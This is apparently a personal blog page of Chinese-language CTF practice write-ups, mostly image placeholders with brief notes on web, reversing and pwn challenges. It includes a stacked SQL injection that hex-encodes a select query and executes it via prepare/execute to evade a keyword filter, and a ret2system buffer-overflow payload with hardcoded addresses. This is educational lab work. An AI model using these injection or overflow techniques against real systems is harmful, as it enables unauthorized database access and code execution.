date
Aug 5, 2021 12:02 PM
Related to 日程数据 1 (blog)
tags
slug
summary
icon
category
password

0x0e supersqli

notion image
notion image
notion image
因为select被过滤了,所以先将select * from 1919810931114514进行16进制编码 再通过构造payload得 ;SeT@a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;# 进而得到flag prepare…from…是预处理语句,会进行编码转换。 execute用来执行由SQLPrepare创建的SQL语句。 SELECT可以在一条语句里对多个变量同时赋值,而SET只能一次对一个变量赋值。
 
 
 

open-source

atoi (表示ascii to integer)
 
./string 51966 25 h4cky0u
 
或者 去判断
notion image
 
 
 

hello ctf

 
notion image
notion image

simple-unpack

 
notion image
notion image
这是有壳啊
notion image
notion image
notion image
notion image
 

logmein

 
 
notion image
notion image
notion image
notion image
适量N
notion image
notion image
 
 

no-strings-attached

notion image
notion image
X追踪一下
notion image
notion image
要解密
notion image
notion image
 

getit

notion image
notion image
 

csaw2013reversing2

notion image
notion image
打开是必须勾选以写入模式加载
notion image
notion image
notion image
notion image
 
notion image
 
参考
 
 
 
 

EasyRE

 
看见奇怪的东西
notion image
是个幌子
notion image
 
逆向算法
 
翻车
 
 
 

level0

notion image
没啥东西
notion image
有提示 点进去
notion image
可以输入0x200的东西 but *buf的长度为0x80
 
notion image
notion image
 
 

level2

 
notion image
漏洞函数在前
notion image
notion image
0x88 可被0x100覆盖溢出
找想要跳的add system 函数 0x08048320
notion image
需要system('/bin/shell') 找到字符 0x0804a024
notion image
构建pyalod
notion image
 
payload=b'a'*(0x88+0x4)+p32(0x08048320)+p32(0)+p32(0x0804a024)
notion image
两种方式都可以
 
 

level3

 
 
DXPXwriteup:Metasploitable
Loading...